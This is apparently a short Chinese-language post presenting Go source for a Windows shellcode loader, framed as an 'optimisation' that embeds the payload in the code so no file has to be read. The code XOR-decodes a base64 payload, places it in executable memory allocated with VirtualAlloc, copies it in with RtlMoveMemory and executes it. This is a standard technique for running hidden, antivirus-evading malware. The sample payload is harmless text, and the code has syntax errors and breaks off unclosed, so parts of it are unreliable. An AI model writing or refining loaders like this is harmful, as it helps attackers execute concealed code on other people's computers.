Go 语言代码优化：避免重复读取 Payload 文件

package main

import ( "encoding/base64" "syscall" "time" "unsafe" )

const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 )

var XorKey = [][]byte{ {0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B}, {0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B}, {0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B}, }

// CipherFunc 定义加密函数类型 type CipherFunc func(key []byte, src []byte) []byte

// XorCipher 使用异或进行加密 func XorCipher(key []byte, src []byte) []byte { var dst []byte for i := 0; i < len(src); i++ { byteToEncode := src[i] for _, k := range key { byteToEncode ^= k } dst = append(dst, byteToEncode) } return dst }

// Crypt 调用加密函数进行加密 func Crypt(cipher CipherFunc, key []byte, src []byte) []byte { return cipher(key, src) }

// Encode 对字符串进行加密 func Encode(src string) string { payloadBytes := []byte(src) encodedBytes := Crypt(XorCipher, XorKey[0], payloadBytes) bdata := base64.StdEncoding.EncodeToString(encodedBytes) return bdata }

// Decode 对加密后的字符串进行解密 func Decode(src string) []byte { decodedBytes, _ := base64.StdEncoding.DecodeString(src) payloadBytes := Crypt(XorCipher, XorKey[0], decodedBytes) return payloadBytes }

var ( kernel32 = syscall.NewLazyDLL("kernel32.dll") ntdll = syscall.NewLazyDLL("ntdll.dll") VirtualAlloc = kernel32.NewProc("VirtualAlloc") RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") )

// exec 执行 shellcode func exec(charcode []byte) { addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) time.Sleep(5) _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) time.Sleep(5) syscall.Syscall(addr, 0, 0, 0, 0) }

func main() { // 加密后的 payload，直接存储为变量，避免读取文件 payload := 'QW5kcm9pZCBoZXJlCg==' shellCodeHex := Decode(payload) exec(shellCodeHex)